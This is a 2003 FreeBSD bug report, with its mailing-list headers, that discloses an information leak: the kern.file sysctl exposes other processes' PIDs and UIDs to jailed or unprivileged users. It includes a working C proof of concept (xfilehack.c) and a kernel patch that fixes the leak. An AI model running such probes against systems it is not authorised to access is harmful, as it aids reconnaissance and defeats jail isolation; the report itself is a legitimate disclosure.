From owner-freebsd-bugs@FreeBSD.ORG Tue Jul 8 02:50:17 2003 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 97A1A37B401 for ; Tue, 8 Jul 2003 02:50:17 -0700 (PDT) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A507043F75 for ; Tue, 8 Jul 2003 02:50:16 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.9/8.12.9) with ESMTP id h689oGUp054838 for ; Tue, 8 Jul 2003 02:50:16 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.9/8.12.9/Submit) id h689oGF8054837; Tue, 8 Jul 2003 02:50:16 -0700 (PDT) Resent-Date: Tue, 8 Jul 2003 02:50:16 -0700 (PDT) Resent-Message-Id: <200307080950.h689oGF8054837@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Pawel Jakub Dawidek Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 779DE37B404; Tue, 8 Jul 2003 02:46:37 -0700 (PDT) Received: from milla.ask33.net (milla.ask33.net [217.197.166.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id A669F43FA3; Tue, 8 Jul 2003 02:46:36 -0700 (PDT) (envelope-from nick@milla.ask33.net) Received: by milla.ask33.net (Postfix, from userid 1001) id E023E3ABB4D; Tue, 8 Jul 2003 11:51:29 +0200 (CEST) Message-Id: <20030708095129.E023E3ABB4D@milla.ask33.net> Date: Tue, 8 Jul 2003 11:51:29 +0200 (CEST) From: Pawel Jakub Dawidek To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 cc: rwatson@FreeBSD.org Subject: kern/54211: Seeing other uid with kern.file sysctl. X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: Pawel Jakub Dawidek List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 08 Jul 2003 09:50:18 -0000 >Number: 54211 >Category: kern >Synopsis: Seeing other uid with kern.file sysctl. >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 08 02:50:16 PDT 2003 >Closed-Date: >Last-Modified: >Originator: Pawel Jakub Dawidek >Release: FreeBSD 5.1-CURRENT i386 >Organization: >Environment: System: FreeBSD czort.hell.none 5.1-CURRENT FreeBSD 5.1-CURRENT #6: Mon Jul 7 18:59:08 CEST 2003 root@czort.hell.none:/usr/obj/usr/src/sys/CZORT i386 >Description: There is a way to get PIDs and UIDs of most of every processes running even if we are in jail or we are unprivileged user, but security.bsd.see_other_uids is set to 1. The only contition is that process have to have opened files. We could use for this sysctl kern.file that don't check if calling process could see other process. This bug doesn't seems to exist in FreeBSD 4.x, because credentials and PID of process isn't exported to userland and in 5.x it is via xfile struct. >How-To-Repeat: Here is a little program which shows how to use it. Should be run as follows: # gcc -Wall -o xfilehack xfilehack.c # jail / temp 127.0.0.1 `pwd`/xfilehack | uniq ---[ start of xfilehack.c ]--- #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { struct xfile *files; const char *comm; size_t fsize = 0; int i; comm = basename(argv[0]); if (sysctlbyname("kern.file", NULL, &fsize, NULL, 0) != 0) { fprintf(stderr, "%s: %s\n", comm, strerror(errno)); exit(EXIT_FAILURE); } files = malloc(fsize); if (files == NULL) { fprintf(stderr, "%s: %s\n", comm, strerror(ENOMEM)); exit(EXIT_FAILURE); } if (sysctlbyname("kern.file", files, &fsize, NULL, 0) != 0) { fprintf(stderr, "%s: %s\n", comm, strerror(errno)); exit(EXIT_FAILURE); } fsize /= sizeof(struct xfile); printf("PID EUID\n"); for (i = 0; i < (int)fsize; ++i) printf("%u %u\n", files[i].xf_pid, files[i].xf_uid); exit(EXIT_SUCCESS); } ---[ end of xfilehack.c ]--- >Fix: This patch fix the problem: diff -ur /usr/src/sys/kern/kern_descrip.c src/sys/kern/kern_descrip.c --- /usr/src/sys/kern/kern_descrip.c Mon Jul 7 22:11:49 2003 +++ src/sys/kern/kern_descrip.c Tue Jul 8 02:26:16 2003 @@ -2284,6 +2284,8 @@ n = 16; /* A slight overestimate. */ sx_slock(&filelist_lock); LIST_FOREACH(fp, &filehead, f_list) { + if (cr_cansee(req->td->td_ucred, fp->f_cred) != 0) + continue; /* * We should grab the lock, but this is an * estimate, so does it really matter? @@ -2301,6 +2303,10 @@ sx_slock(&allproc_lock); LIST_FOREACH(p, &allproc, p_list) { PROC_LOCK(p); + if (cr_cansee(req->td->td_ucred, p->p_ucred) != 0) { + PROC_UNLOCK(p); + continue; + } xf.xf_pid = p->p_pid; xf.xf_uid = p->p_ucred->cr_uid; PROC_UNLOCK(p); >Release-Note: >Audit-Trail: >Unformatted: